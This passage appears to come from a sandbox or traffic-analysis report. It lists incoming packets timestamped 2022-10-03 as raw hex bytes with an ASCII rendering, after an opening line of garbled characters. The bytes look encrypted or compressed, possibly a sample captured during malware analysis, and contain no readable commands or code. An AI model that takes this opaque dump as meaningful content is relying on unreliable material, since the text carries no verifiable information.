]3\;O%LcR6x6,c~[!Nu,)Cp\R$FwCSu{QCH~Jo-<'e.s&Aht%-rR)9,{.ATi<%T 6w"X[5+>R%M:7ap8Vir`G3LcnCG$Tb
2022-10-03 14:13:31 UTC	156	IN	Data Raw: fc 4e 94 20 e8 03 1d cd be 50 76 f3 40 c3 fa ab d3 b3 9c 33 5d 2b 65 5f f4 1f 58 e3 4b 6b f6 36 4b 01 bc 71 e6 0a 76 91 34 5d ba 9f 7c ee 1f e0 c0 08 53 c3 b6 23 2a 1d 53 de 78 02 18 ed 60 9e 26 60 9a ef e0 4a 6f ea d2 7a 93 7b 36 9f 44 14 03 19 17 59 a8 4e 0a 78 f2 dc be fa 4e 2d 0d 6f df e3 ad 2e 09 77 fe c6 a9 b9 35 de 55 7a 46 bb 19 2f 21 46 0a 6f 81 ed 68 d9 dd 86 b5 06 c9 8b 75 55 af 47 5b 69 76 8e ec f8 e3 84 b6 04 53 72 a8 11 9f 19 02 4c f2 4f 3b 96 30 7f 81 6d 8f 2b bf 16 6c 50 36 d4 07 6a dd 9b c2 70 6d da 21 f9 08 ee ec 53 33 ca 6e 82 ec c7 b7 45 bd c5 d2 a3 89 6e 2f 49 00 bb 37 73 cb db 34 b0 9c 3a e9 75 81 93 61 72 7f e3 5e 12 d8 4b 62 c6 c8 77 5b 0b 2d 51 5b 1d 4c c9 24 f5 b1 28 0a 5c 90 56 4f 17 7a 1e 31 4c 14 6b 87 83 f1 85 7b c7 3b 11 4b Data Ascii: N Pv@3]+e_XKk6Kqv4]\|S#*Sx`&`Joz{6DYNxN-o.w5UzF/!FohuUG[ivSrLO;0m+lP6jpm!S3nEn/I7s4:uar^Kbw[-Q[L$(\VOz1Lk{;K
2022-10-03 14:13:31 UTC	157	IN	Data Raw: 89 f3 fb 8f b8 af e8 e8 d4 c6 d2 df d9 7a c4 74 cf 93 7e 98 ff 08 70 be 5e 56 38 97 aa fb 8a 78 e2 d3 bb ed c9 90 82 c8 d5 57 d5 cc c5 48 91 dd 3b 37 4f 3d 64 d0 89 45 73 30 f0 d4 68 62 12 74 be 3b f1 f1 32 8b 26 34 7d 3b a5 b2 23 2d 90 49 8e 3a 46 a6 f1 5e 55 65 16 af 24 f2 25 00 c9 e6 30 a8 c4 f5 b1 a5 5a d4 35 55 e1 d8 af af 55 37 fa 36 18 62 19 3b a1 11 f4 c6 ea 9e 81 7e 89 ff e9 64 4b 11 64 87 04 81 fd 70 17 04 ea ac b3 86 c7 73 9d 96 03 c2 af b7 94 d2 9d 47 8f 99 4a 52 b6 15 93 4c 7b 18 b8 e8 8a b8 0c 0f f4 8b 8b 06 62 07 3d ff 67 3b 85 c6 43 72 5f c2 dd 99 3d ca 23 05 85 47 e9 f8 39 53 69 e1 cf 46 c0 28 8e fe 6d 11 11 60 17 1b 97 96 26 57 5c 50 a2 20 6c cd 12 ca 50 ea 1c 38 89 85 a0 73 e7 ab 06 62 1a 9e 7a 6c b9 19 cf 0b a6 c6 3c 1e 0a 02 e7 4b 9c Data Ascii: zt~p^V8xWH;7O=dEs0hbt;2&4};#-I:F^Ue$%0Z5UU76b;~dKdpsGJRL{b=g;Cr_=#G9SiF(m`&W\P lP8sbzl<K
2022-10-03 14:13:31 UTC	158	IN	Data Raw: 5c bb 1a 45 f6 ab 87 c6 9f 83 e6 99 60 b3 a2 c4 24 76 e4 9d 8f f3 41 49 0e 77 98 3b 4d 67 ce d7 53 84 2e 80 41 9a 87 c5 a5 60 09 f0 1e 71 79 af 9d e4 b2 d9 1b 56 fe 78 c3 19 f9 a3 64 2b cd ec 7b c6 69 48 53 39 0f 27 87 e3 da c2 91 61 95 d6 58 bc f7 57 85 c7 93 3d a7 56 9f f3 02 a3 ef 0a 6d 8d 55 5d a0 9d 43 10 8b b4 76 76 41 46 d7 6d 52 13 d2 1e b8 0d 20 f4 9b 9e 37 32 96 89 c7 3f cc 86 3c d7 9e dd 98 85 df 69 91 b1 bb 34 60 60 28 91 eb aa ad 1e 4c 63 f0 be bb 07 54 2f 0d 9b 61 fc a2 95 6e dc e2 d8 95 c0 a9 7f 0a 88 2a 3d 78 61 85 2b 75 9d bf 6f b9 f7 a2 9e 78 18 0f 0f 4e 79 c5 b5 8a 3b f1 03 9b 84 f1 48 e6 be 69 cf a4 64 83 58 dd 5e c5 b8 9a f3 0e d9 ad 0a 7a 52 c0 d7 76 3d ed 5e b2 af 1c 58 a8 11 b2 da e2 8f 08 f3 a3 b3 f3 fb 51 53 03 5b 87 23 28 b9 50 Data Ascii: \E`$vAIw;MgS.A`qyVxd+{iHS9'aXW=VmU]CvvAFmR 72?<i4``(LcT/an*=xa+uoxNy;HidX^zRv=^XQS[#(P
2022-10-03 14:13:31 UTC	159	IN	Data Raw: ab 06 c6 d5 f1 56 f3 c0 6d d4 b7 bd c1 78 95 bc 32 a6 2b 00 95 09 63 60 59 00 10 f8 ae 1c 2c 76 9c 0e d2 13 5d f5 f2 8a e3 ff 6f 2f e4 1f f0 e6 22 19 f8 7b fb ba 14 cb f7 bb ac e2 fd e2 9e cc db d1 93 db 57 e8 bb 65 c6 d0 2e 9c 66 97 15 cb 69 51 60 1c 82 13 3e 46 02 39 1e 60 c9 0c a4 3c 77 04 dc 03 4b b9 cd b1 9c a6 3f 51 81 9b 71 05 0f a7 42 e2 61 78 f6 39 39 99 a3 f1 d4 89 4c 52 91 b7 28 2d 8a 6c e4 96 7f 32 c2 ca 34 8a 0e af ce bf 44 4d 5c 8c 9b 4a 8e 0e 2f d2 cd b2 f7 4b 6e 15 e0 fa b0 7d 84 b2 3a 90 0b 2a e7 72 19 67 06 24 cf 1d 35 4c bf f6 ab c6 56 80 15 7f de 95 4e 49 48 1b 10 7e ce 13 7a b2 36 d1 18 d6 e6 e1 2c ed 83 12 30 d8 52 c2 e0 05 76 f6 95 db 6c 76 52 bb ea fa 09 15 45 5c ac 36 00 fa ba 1d 1a 26 7f b9 e6 4c b2 46 8e d1 38 a4 96 77 cc 0c 86 Data Ascii: Vmx2+c`Y,v]o/"{We.fiQ`>F9`<wK?QqBax99LR(-l24DM\J/Kn}:*rg$5LVNIH~z6,0RvlvRE\6&LF8w
2022-10-03 14:13:31 UTC	161	IN	Data Raw: ba 42 10 71 4a 52 ee 4c a1 60 89 58 67 0f 2a 08 73 18 1e 71 04 20 99 65 f5 d7 6c 69 29 0e 4d b8 95 dc ee 16 25 7e 79 e5 98 a2 4b bd 9f 3f 38 af 3a e3 dc 9c df d1 4e 93 c0 72 90 7f 1e 62 1a 1e 14 e3 5c 22 53 a1 f1 75 68 11 cc ff ed 9e ff 18 c1 c9 e6 72 68 e9 d9 c3 42 fa 69 30 2c 44 ed fd 14 e3 ca df ff 6a 1e 58 65 bb ee 18 1e 3a e4 09 0a cc 2e 55 73 e1 73 eb a2 81 40 89 a7 13 63 02 b6 5c e0 0e 44 c1 1e 5a 61 1f 5b 12 b7 77 7b 19 d4 80 38 40 c1 85 c3 f8 f7 03 26 e4 1e 3e 55 c8 e1 eb 32 2d 50 f9 e7 20 ae 44 5d a8 41 22 0a 86 03 1d fc 88 6f 86 c7 73 78 dd de c2 fe 91 e2 97 1c ae 23 19 6a 21 7b e1 d1 a0 25 39 ed f4 02 bc 07 20 58 44 e9 2e b3 84 ea 0e 29 93 47 fc bf c6 31 60 89 52 5e 2f 23 cc df 20 1a f8 33 dc 87 d6 91 0b 3d 55 69 12 86 9e 27 d7 1e f7 12 90 f5 Data Ascii: BqJRL`Xg*sq eli)M%~yK?8:Nrb\"SuhrhBi0,DjXe:.Uss@c\DZa[w{8@&>U2-P D]A"osx#j!{%9 XD.)G1`R^/# 3=Ui'
2022-10-03 14:13:31 UTC	161	IN	Data Raw: 25 ac 0b 3c 48 45 50 bc 5d 4f c1 1c c2 44 a5 15 94 93 88 ab 7d f6 d3 17 4b 01 97 6f 28 98 bc f9 28 83 eb 00 be 27 3f ce 47 8a ff 8a ca 69 62 7b af 14 fe bb 1c c8 8e 84 99 63 c5 89 c9 29 b1 2b ed ee 96 15 92 39 ba 0c be f6 ae 31 60 ed d0 1c 4e 14 0c c1 ed d7 02 52 98 4a ad 64 d6 b8 2c 29 74 69 74 b8 e7 41 14 17 f4 9b 6b 4d de 80 cc 42 07 8f 27 a3 6d d2 c9 8a 7b 16 f7 74 97 9e 64 e0 e6 33 08 15 c8 0d c4 63 29 6e f1 5a 00 02 6e c2 20 6e d5 49 4c 73 66 ba 5f f2 3d 4b e5 aa 4b f2 60 d2 db 71 0e 2a 15 4e 51 1f ca 40 27 ca 65 aa ad 6f 68 39 13 39 f1 2b 63 f2 13 76 7e 1a 48 8f a2 4b a0 20 75 39 6e 6e e4 89 8c b8 75 4f 92 c0 6f 2f 35 1f a6 5e 19 43 e3 2d 39 45 a0 f1 68 1d 54 72 34 f1 9c a9 18 b4 07 e7 72 68 f4 66 8e 43 37 75 3b 7b 44 93 42 17 e3 ca e2 52 3f 1f 82 Data Ascii: %<HEP]OD}Ko(('?Gib{c)+91`NRJd,)titAkMB'm{td3c)nZn nILsf_=KK`q*NQ@'eoh99+cv~HK u9nnuOo/5^C-9EhTr4rhfC7u;{DBR?
2022-10-03 14:13:31 UTC	163	IN	Data Raw: 45 07 77 d8 f6 46 c0 6c 97 1a 14 f9 bb d0 a5 93 20 85 c8 af 82 83 7d c6 fb 14 b7 2a 8e 99 d3 59 df 20 27 3a 78 b2 1f 15 87 9c 20 6e 79 69 e7 2a be 6e a1 3f 6d 8c 4c fe 5d 2f 76 a3 b4 9e d0 62 1e 15 72 eb 01 b4 2e 8e d9 d0 12 25 b2 30 10 93 13 1b 5c 60 63 d2 c0 ba 83 86 6d c5 92 38 49 65 03 a0 8f 66 b3 dd c3 1c 3f 62 43 60 cd bf 78 b6 4e 7e 25 b1 b6 d9 7f 79 d0 b0 d9 15 25 aa a9 1a 7d e9 e0 68 3d 58 74 d0 c5 ab 9b a9 bc 8f 48 77 c8 06 c0 28 6e b8 3d dc 08 5d 2f ec 0c bb 44 34 a9 9a 2e b7 d6 86 e2 d4 ec 5d c4 70 c0 1b 4b 8e ea 45 6b 70 7f bf 91 fe 4b b6 fc 93 d7 bc b0 0c 06 af 97 a1 6c 27 03 60 ac e7 65 25 c6 08 10 db 38 5e 08 da 50 d6 ed b5 ba 58 de 9c 4f b6 51 1d de 29 20 70 38 0e 72 e1 bb 1e 3b 66 f5 2e dd 11 96 d4 52 9f ec fd 07 30 39 0a ff e4 68 39 35 Data Ascii: EwFl }Y ':x nyin?mL]/vbr.%0\`cm8Ief?bC`xN~%y%}h=XtHw(n=]/D4.]pKEkpKl'`e%8^PXOQ) p8r;f.R09h95
2022-10-03 14:13:31 UTC	164	IN	Data Raw: f1 40 de 08 7d 78 de 87 db e6 5c 5c c5 d9 e9 69 00 53 21 9e 36 7c df ac 3e 10 7d 83 b0 f0 68 a0 26 53 cc 2e 81 84 66 39 77 b1 23 0f 93 76 30 8e 12 6e 73 05 7f 6a dd bc a8 4d 44 50 78 09 4d c1 1c df 57 ea 50 17 32 8d aa 7d 0a 86 1e 4b 01 8a 7c 67 9d 00 53 2d 82 eb 34 01 25 3f ce 5a 99 b0 99 76 de 67 7a af 78 51 a9 1c c8 93 c2 dc d8 40 ac cd 28 b1 83 04 ec 96 15 8f 7f ff b4 13 d9 aa 33 70 31 0a 0e 4e 14 11 42 aa 69 ab 6c 9c 48 ad 70 06 ba 2c 29 69 2f 3f bb 5f 09 10 15 f4 d3 0a 59 de 80 d1 53 4d 31 89 c3 69 d0 c9 12 45 15 f7 74 8a 9f 2e 5e 54 5c 0c 17 c8 b9 a0 76 29 6e ec 5c 52 58 fa d0 25 6c c5 f5 3e 70 66 ba 42 f1 7f e3 5b 3b 4e f0 60 66 7a 64 0e 2a 08 48 02 45 50 52 22 c8 65 bd f4 6c 68 39 0e 2f ba 95 dc 75 16 74 7e 37 c6 9a a2 4b bd 36 3e 87 ae e9 e1 8a Data Ascii: @}x\\iS!6\|>}h&S.f9w#v0nsjMDPxMWP2}K\|gS-4%?ZvgzxQ@(3p1NBilHp,)i/?_YSM1iEt.^T\v)n\RX%l>pfB[;N`fzd*HEPR"elh9/ut~7K6>
2022-10-03 14:13:31 UTC	165	IN	Data Raw: 24 b3 84 df 0c b5 90 8c ba b6 76 3b df e0 5d 5e 2f 1e ce 7a 23 d1 fe 21 86 a6 82 e7 01 3d 55 54 10 21 9d ec 91 17 5a 18 56 89 f3 4a f6 fb 57 f6 ef 2d 8b 14 33 19 54 f0 c2 b3 56 96 ec 5f 1b 51 af ee e1 54 fd 6c 9d 9e c8 16 81 38 d6 ad 85 ec 5f ea 0f 85 d1 c3 d7 04 2a 7e b4 59 05 96 ff 5a 1f cf 60 90 12 8f ee 0e 19 1a 8a 12 13 98 d2 08 bb e2 d2 55 64 69 05 24 7a 3c 09 58 62 86 58 72 22 c5 20 46 93 67 08 0b cf 34 4a bf bb f4 96 6b c5 2d b9 50 76 25 1f 31 0d ea dd c5 1c 80 63 c5 f0 cb ae e7 08 1f 6b 29 b9 19 af 46 71 d6 90 30 12 7d 1d ae 3f 95 e7 b0 e9 52 58 49 f2 95 a5 95 06 05 ab c9 6f ce a4 16 29 fc b1 3b da bf 00 9c f6 0a b3 24 86 90 92 28 b7 69 81 64 7b eb 4e 7b 79 90 db 24 8e 45 43 3b 7e 79 10 7e ec 1b b6 fa 4f 5c ba e0 04 00 eb 2a f6 e0 0e 0f 68 13 d6 Data Ascii: $v;]^/z#!=UT!ZVJW-3TV_QTl8_~YZ`Udi$z<XbXr" Fg4Jk-Pv%1ck)Fq0}?RXIo);$(id{N{y$EC;~y~O\h
2022-10-03 14:13:31 UTC	167	IN	Data Raw: 68 15 06 f0 05 58 94 92 78 89 26 08 ae 72 4c 78 06 24 5d 1d 64 4a 2e df 28 c9 15 a9 3b 57 cc 95 14 64 2b 1d bd 7f 50 12 2c 94 24 d1 f5 db 13 c7 28 cd 58 3d 82 ff 63 c2 0a 2d 58 de 07 db f0 7a fb 9f 5a f5 4a 01 53 79 be 36 fc df ba 18 b7 27 09 ac d3 69 a0 46 73 cc ae 81 92 57 9e 17 25 aa 2c 92 76 bc ae 12 ee 73 13 4c dd ac 59 32 6e 45 50 bc 29 4d 41 1c c9 64 5d 15 d9 9d ae ab 7d f6 a6 1e cb 01 9c 4f d0 98 fd f7 0b 83 eb 00 20 25 bf ce 4c aa 07 8a b7 67 41 7b af 14 70 a9 9c c8 80 a4 61 63 8b 87 eb 29 b1 2b 25 ec 16 15 99 19 42 0c e3 f8 83 31 70 ed 2b 0e ce 14 07 e1 05 d0 a2 43 b7 4a ad 64 24 ba ac 29 7f 49 82 b8 46 50 3b 17 f4 9b 28 59 5e 80 c2 62 f2 8f aa b2 42 d2 bd 14 67 15 f7 74 8c 86 75 c0 db 22 27 15 44 93 82 76 29 6e ea 42 11 22 78 d3 0f 6e 41 d6 1c Data Ascii: hXx&rLx$]dJ.(;Wd+P,$(X=c-XzZJSy6'iFsW%,vsLY2nEP)MAd]}O %LgA{pac)+%B1p+CJd$)IFP;(Y^bBgtu"'Dv)nB"xnA
2022-10-03 14:13:31 UTC	168	IN	Data Raw: dc e9 b2 2d 8d f9 45 27 b5 53 b6 ae f5 00 37 84 81 1d 31 90 36 a6 d4 73 d5 dc 6a 23 cb 93 6a 97 d1 ae 9e 19 27 36 dd e7 85 48 10 3b 61 f4 cf b4 a0 2c 28 53 90 2c 3b 6c df 0c b5 93 8a f4 1b ca 47 77 ad 55 ca c7 1e ce 7a 20 d7 f0 5a f5 a9 d7 a1 09 f5 bd 54 10 21 9e ea df 7a de 5e 94 c4 fb 9e 1e fb 57 f6 ec 2b c5 4a b7 9a 90 bd ca bb bf 96 ec 5f 18 57 e1 84 76 ca 96 21 95 8a c6 70 81 38 d6 ab 9c 8c 38 de 8a c1 d9 8b ca 62 2a 7e b4 5f 1b 1f 98 77 ea 82 68 c1 d3 e8 ee 0e 39 1c 84 41 5f a7 2e 45 b3 86 f7 32 64 69 05 22 6b 83 b7 10 9f cb 50 4a c9 c5 20 46 13 61 01 70 51 cb 45 f1 b3 48 7d 6b c5 2d 39 56 67 ba a1 29 7f a7 d5 89 f1 80 63 c5 70 da bf 78 b6 01 6e 67 b1 95 32 2f 71 d6 b0 36 14 ca a3 85 02 db ef 84 8f 3b 58 49 d2 94 a3 22 a8 59 96 86 67 22 f4 7f 29 fc Data Ascii: -E'S716sj#j'6H;a,(S,;lGwUz ZT!z^W+J_Wv!p88b*~_wh9A_.E2di"kPJ FapQEH}k-9Vg)cpxng2/q6;XI"Yg")
2022-10-03 14:13:31 UTC	169	IN	Data Raw: 51 ab 89 d5 7e 11 d2 a8 80 9e f4 ac 38 35 82 5c ca ce 44 e9 00 75 d8 83 fc e0 4c e4 96 65 21 8a 6d cf d7 0f e8 7c 4d f8 64 46 8c 3f 5f 71 27 3b a7 42 ef de 28 2f 14 06 f0 85 4b 82 0d c6 a2 ad 40 8c ae 0b 79 06 24 dd 0e 72 c0 95 ab a2 81 36 ad 70 56 cc 95 94 77 3d 16 1c 0b d7 5a 0f 24 69 d0 f5 db 93 d4 3e 0b f3 4e 05 b7 40 16 44 2c 58 96 87 c8 e6 e9 65 eb e3 bd 69 41 03 78 be 36 7c cc ac 2c 0d 53 b9 e4 f0 61 f3 47 73 cc 2e 92 84 aa 07 63 8b e2 0f ae 22 bd ae 12 6e 60 05 57 67 d8 87 7a 4d 05 06 bd 29 4d c1 0f df 6a c9 61 16 d5 8d 07 2a f7 a6 1e 4b 12 8a c0 69 b3 22 bf 2d af b3 01 20 25 3f dd 5a e8 bd fe 4f 2f 67 1b f5 15 70 a9 1c db 93 6d df 48 66 cf cc 41 ea 2a 25 ec 96 06 8f 6c d6 78 01 b0 ab 0d 2d ec 2b 0e 4e 07 11 56 af a3 b1 14 9d 22 f3 65 24 ba 2c 3a Data Ascii: Q~85\DuLe!m\|MdF?_q';B(/K@y$r6pVw=Z$i>N@D,XeiAx6\|,SaGs.c"n`WgzM)MjaKi"- %?ZO/gpmHfA%lx-+NV"e$,:
2022-10-03 14:13:31 UTC	170	IN	Data Raw: 19 99 95 e0 ce 23 8b 91 6c a7 e0 46 e9 c0 87 e8 36 a4 68 65 45 19 3e 37 0f 59 c1 7b 5c c9 a0 5a 3d a6 30 e5 87 bc 80 25 40 b3 83 69 11 fc c8 2e a3 a1 1f 8d c9 dc e9 b2 2b 9b 46 eb c9 87 03 f2 b6 98 23 37 84 81 1b 37 27 6b ab da 34 91 94 04 c3 cb 93 6a 91 d7 01 27 4e 69 66 99 47 0b a1 10 3b 61 f2 d1 e7 24 e1 58 03 d4 74 68 85 df 0c b5 82 94 9d 94 41 31 27 e9 e1 7c 2f 1e ce 7a 26 c9 a3 18 ce 87 91 e5 6d e1 54 54 10 21 98 e4 2a 0d bf 13 d7 80 63 96 f7 fb 57 f6 ea 25 c4 0d 51 13 c0 f9 6e 6f 57 96 ec 5f 1e 59 24 cb 71 74 c6 65 4d 42 2e 70 81 38 d0 a5 42 d2 0e e1 ce 85 3d 1f 22 62 2a 7e b2 41 48 bf 5e 76 a9 c6 f4 4f 3b e8 ee 0e 38 1a 23 1b e5 9e 69 01 37 02 1f 32 64 69 04 24 d4 3d 41 5f d9 8f 92 92 23 c5 20 46 02 7f 78 0a f6 35 15 b5 07 d6 96 6b c5 2d 3f 48 3c Data Ascii: #lF6heE>7Y{\Z=0%@i.+F#77'k4j'NifG;a$XthA1'\|/z&mTT!cW%QnoW_Y$qteMB.p8B="b~AH^vO;8#i72di$=A_# Fx5k-?H<
2022-10-03 14:13:31 UTC	172	IN	Data Raw: d5 c1 b0 aa ea e2 26 02 ed df cd d1 e1 c6 ce fd 98 67 fe c2 21 76 71 97 93 c0 e0 45 15 1a c0 38 71 52 20 c7 63 79 21 28 24 3c ca 0f f6 15 0d b9 8f 68 ef b5 39 51 3d 9a 13 2e 20 a5 e3 c7 fd ae ed 39 35 82 ca d9 e4 8b c1 77 3e 9f fd d2 a3 4d e4 96 f3 32 73 eb fe a0 44 af e6 5b ba 65 46 8c a9 4c 10 24 10 d0 09 a8 68 b2 69 15 06 f0 13 58 3a b5 f2 8a ff 07 5e 8c 4d 78 06 24 4b 1d f9 68 a4 dc e9 c6 d8 57 3a 57 cc 95 02 64 b1 34 37 7c 9c 1d 05 6b 25 d1 f5 db 05 c7 8b ef c2 39 4e f0 65 3d 0b 2d 58 de 11 db 0e 48 71 9c a8 fa 28 fe 52 79 be 36 ea df 73 3a 3d 24 f2 a3 ad 96 a1 46 73 cc b8 81 96 64 14 14 c0 a5 76 6d 77 bc ae 12 f8 73 0c 6f 57 af cc 3d d8 ba 51 bc 29 4d 57 1c 85 50 d7 16 5d 92 3c 54 7c f6 a6 1e dd 01 b7 6c 5a 9b 70 f8 e1 7c ea 00 20 25 a9 ce 07 9f 8d Data Ascii: &g!vqE8qR cy!($<h9Q=. 95w>M2sD[eFL$hiX:^Mx$KhW:Wd47\|k%9Ne=-XHq(Ry6s:=$FsdvmwsoW=Q)MWP]<T\|lZp\| %
2022-10-03 14:13:31 UTC	173	IN	Data Raw: 79 90 90 72 60 76 1c 62 5f 1c d4 e3 1d 09 66 a2 a1 75 6c 10 71 fe f0 9e 3f 18 d0 cc d1 70 38 e9 f4 ca 40 fa 74 30 ec 44 c4 d6 23 e1 9a df e3 64 1c 58 78 bb 2e 18 00 3f d3 0a 5a cc 45 5c 71 e1 46 e9 56 81 96 a2 90 11 33 02 ec 52 e2 0e 59 c1 ed 5a 18 1a 6e 11 f7 77 f2 12 69 81 25 40 25 85 88 d3 c8 00 76 e4 99 36 57 c8 dc e9 24 2d 63 fc df 23 fe 44 a8 a7 43 22 37 84 17 1d 9b a4 58 85 97 73 ea d5 dc c2 cb 93 fc 97 c8 a8 14 1a 3a 21 04 ee d3 a0 10 3b f7 f4 26 92 30 23 08 44 6a 25 b1 84 df 0c 23 93 05 fd 80 c5 61 60 36 5c 5c 2f 1e ce ec 20 b7 fe 0c df d7 d6 e5 03 3f 55 54 10 b7 9e 35 d6 21 f4 42 90 a2 f1 48 f6 fb 57 60 ec e4 cb 22 93 43 87 bd c0 b1 56 96 ec c9 18 7c eb d8 52 0e 81 03 9f 9c 2f 70 81 ae d6 51 92 c1 3c 9b 89 02 d3 c1 23 62 2a e8 b4 3d 11 ab 9c 26 Data Ascii: yr`vb_fulq?p8@t0D#dXx.?ZE\qFV3RYZnwi%@%v6W$-c#DC"7Xs:!;&0#Dj%#a`6\\/ ?UT5!BHW`"CV\|R/pQ<#b*=&
2022-10-03 14:13:31 UTC	174	IN	Data Raw: 58 bf a2 be 55 0e da 6d 42 bd e6 b8 6d 63 cd 38 07 43 1f 61 28 65 f6 3e cc d0 d5 aa 4c 3d a4 5e 2d c4 13 90 42 ed 1b f1 ca 03 60 96 e8 f2 e4 6e 39 8a fe ed bc df db 87 f8 ba e4 c7 fd ec df cd 47 77 02 4c c9 af 35 ae e5 24 8a 70 97 93 56 76 75 68 29 f7 6a 21 1a 19 3b 62 79 21 be b2 d7 18 3b c1 47 5d d3 dd 94 ee b5 39 c7 ab 22 f4 1d 17 f7 b3 4c 8b 52 ec 39 35 14 5c c0 cb bc f6 25 6e 33 96 2e a2 4d e4 00 65 d0 ac d8 c9 f2 14 61 69 a7 bb 65 46 1a 3f 0c 74 13 27 82 59 47 cb 4e 68 15 06 66 85 6b a9 87 c5 d8 af 17 9a 70 4c 78 06 b2 dd 7a 77 5f 93 8e b9 f7 20 ab 3b 57 cc 03 94 3e 16 08 00 2e cc 4f 19 96 24 d1 f5 4d 93 5b 3b d8 f5 6b 1e 83 56 c0 0a 2d 58 48 87 5a cd 6f 46 ce f8 6e 7f 03 53 79 be a0 7c 0b a9 0d 0a 76 a2 16 e6 6b a0 46 73 5a 2e 65 af 42 23 46 90 72 Data Ascii: XUmBmc8Ca(e>L=^-B`n9GwL5$pVvuh)j!;by!;G]9"LR95\%n3.MeaieF?t'YGNhfkpLxzw_ ;W>.O$M[;kV-XHZoFnSy\|vkFsZ.eB#Fr
2022-10-03 14:13:31 UTC	175	IN	Data Raw: f4 d2 75 4a 52 ab d8 f2 eb c7 6d 66 5e 2a d0 6e 18 1e 71 41 b4 ca e7 a9 e2 6e 38 39 f7 19 b8 2a dd f3 80 76 cb 0f d0 98 f2 4b a6 01 3c 38 af 6f 77 88 30 bb e4 4e c2 c0 4e 0e 7c 1e 62 5f 8a 42 c0 3b 17 51 f0 f1 2b 3c 1a 73 fe f0 08 a9 ce b7 fc e6 22 68 96 47 c0 42 fa 74 a6 7a bd 84 c8 14 b3 ca 7e 71 6e 1e 58 78 2d b8 18 9d 0f e4 58 0a 0f b0 56 73 e1 46 7f c0 b5 f1 bc a7 43 63 e7 38 58 e0 0e 59 57 7b 70 cd 2a 59 43 a7 70 c7 19 6b 81 25 d6 b3 72 75 cd ff 52 26 cd 83 3d 55 c8 dc 7f b2 73 9f cc e8 71 ae 0e d0 ac 41 22 37 12 81 c8 2a bd 6f d7 c7 1f b3 de de c2 cb 05 6a 1f d3 9b 23 48 6a af bb e5 d1 a0 10 ad 61 fd d7 89 07 71 58 f4 f6 2e b3 84 df 9a b5 54 88 c9 b7 97 31 b1 cb 57 5e 2f 1e 58 7a 13 cf cd 3b 8d 87 25 c7 0b 3d 55 54 86 21 70 e8 e2 16 a6 12 85 a3 f9 Data Ascii: uJRmf^nqAn89vK<8ow0NN\|b_B;Q+<s"hGBtz~qnXx-XVsFCc8XYW{pYCpk%ruR&=UsqA"7oj#HjaqX.T1W^/Xz;%=UT!p
2022-10-03 14:13:31 UTC	177	IN	Data Raw: a5 5b bd e5 9c bb 5b 31 cc 90 78 b7 70 aa 66 c4 ea 5d ed 71 10 1a 78 8c 15 43 00 55 7b bf 78 ff 8d be 53 91 00 b8 b0 04 5c 82 2a a0 e7 37 93 60 ad f4 c2 2e 90 08 c2 f0 a8 57 0e da fb d4 6e bf 89 5a 31 9d a7 8b 55 1d 61 28 f3 60 38 0d f8 e2 f8 1c fc 4b 48 2f c4 13 06 d4 10 9c c0 fd 51 30 74 21 e4 e6 6e 39 1c 68 a3 ae f4 ec d5 a8 be cc d0 ff ec df 5b d1 50 c5 7d fe fd 65 88 ec 33 88 70 97 05 c0 27 50 43 1e a5 3a 69 7c 0e 39 62 79 b7 28 e9 3f 29 0c 93 17 34 97 ca 96 ee b5 af 51 25 8f e0 2a 45 a7 38 e9 9c 50 ec 39 a3 82 d9 da fb 8b a4 75 c3 b1 81 2c a2 4d 72 96 dd 27 bf ef 9b a2 db 81 7e a5 bb 65 d0 8c 90 4f 44 24 75 d2 a8 86 dc 4c 68 15 90 f0 a3 4e b7 b0 97 88 bc 28 8e 72 4c 78 90 24 04 1e 47 68 c1 de 8d e9 34 a9 3b 57 5a 95 68 73 08 3f 52 7e 99 32 0d 94 24 Data Ascii: [[1xpf]qxCU{xS\7`.WnZ1Ua(`8KH/Q0t!n9h[P}e3p'PC:i\|9by(?)4Q%E8P9u,Mr'~eOD$uLhN(rLx$Gh4;WZhs?R~2$
2022-10-03 14:13:31 UTC	177	IN	Data Raw: b2 fb 9a b3 bd a5 ee 5f 18 51 7f ed 31 54 b4 67 c5 9e 23 44 83 38 d6 ad 02 f4 ff c9 bc 87 89 c3 0e 56 28 7e b4 59 85 9e 6a 64 db c4 38 90 75 dc ec 0e 39 1a 0a 1a 95 b6 1b 03 e3 e2 6e 06 66 69 05 24 fd 3c 92 4a ab 8d 00 72 b3 f1 22 46 13 67 8f 2b 65 36 67 b7 e3 f4 24 5f c7 2d 39 50 f1 05 c9 24 52 e1 85 c5 cf b4 61 c5 70 cb 29 c7 fe 1d 43 21 e1 19 2b 1b 73 d6 b0 30 82 75 cb ba 2f 9d bf b0 75 0e 5a 49 d2 95 35 9d da 00 bb c1 37 ce 30 4a 2b fc b1 3b 4a a7 fd a8 d0 08 eb 24 6b cc 90 28 b7 69 11 64 59 e9 68 79 21 90 6a 78 8c 45 43 3b ee 79 ab 6e ca 19 ee fa 09 00 b8 e0 04 00 39 28 67 e4 02 07 30 13 5a c2 2e c0 08 bf 4b aa 17 19 ef 6f 84 bd 63 89 5a 61 9d 38 30 57 ec 62 1d 67 30 3e e1 f8 e2 a8 1c 3d f0 4a ce dc 26 92 84 ed be c3 fd 01 30 96 9a e6 fd 6a 0c 88 38 Data Ascii: _Q1Tg#D8V(~Yjd8u9nfi$<Jr"Fg+e6g$_-9P$Rap)C!+s0u/uZI570J+;J$k(idYhy!jxEC;yn9(g0Z.KocZa80Wbg0>=J&0j8
2022-10-03 14:13:31 UTC	179	IN	Data Raw: 10 c2 12 6d 5a de 87 db 70 5a 6f 98 cd f8 39 01 6a 39 bc 36 7c df 3a 38 f3 08 97 a1 a0 69 fa 06 71 cc 2e 81 12 77 84 17 a5 a7 5f 92 0d fc ac 12 6e 73 93 6c 10 ab a9 3f 1d 45 cd fc 2b 4d c1 1c 49 44 07 15 38 90 dd ab c3 b6 a4 1e 4b 01 1c 6f ba 9f 15 fa 7d 83 0b 40 22 25 3f ce cc 8a 81 89 61 6a 37 7b ad 55 72 a9 1c c8 05 84 d6 65 51 8a 9c 29 92 6a 27 ec 96 15 19 39 8d 0f 2f f5 fb 31 35 ac 29 0e 4e 14 87 c1 32 de 9f 51 cd 4a ca 25 26 ba 2c 29 ff 69 a7 bb 7e 42 41 17 7c da 2a 59 de 80 47 42 29 84 bd a0 38 d2 60 cb 65 15 f7 74 1c 9e ea e3 60 30 5d 15 03 4c 80 76 29 6e 7a 5a bd 11 ee c1 75 6e 29 08 1e 70 66 ba d4 f2 99 48 67 a9 1e f2 6d 90 5a 64 0e 2a 9e 4e 3d 0d 44 43 72 ca 4a e8 d5 6c 68 39 98 39 a2 29 e8 f1 46 76 2f 58 e7 9a 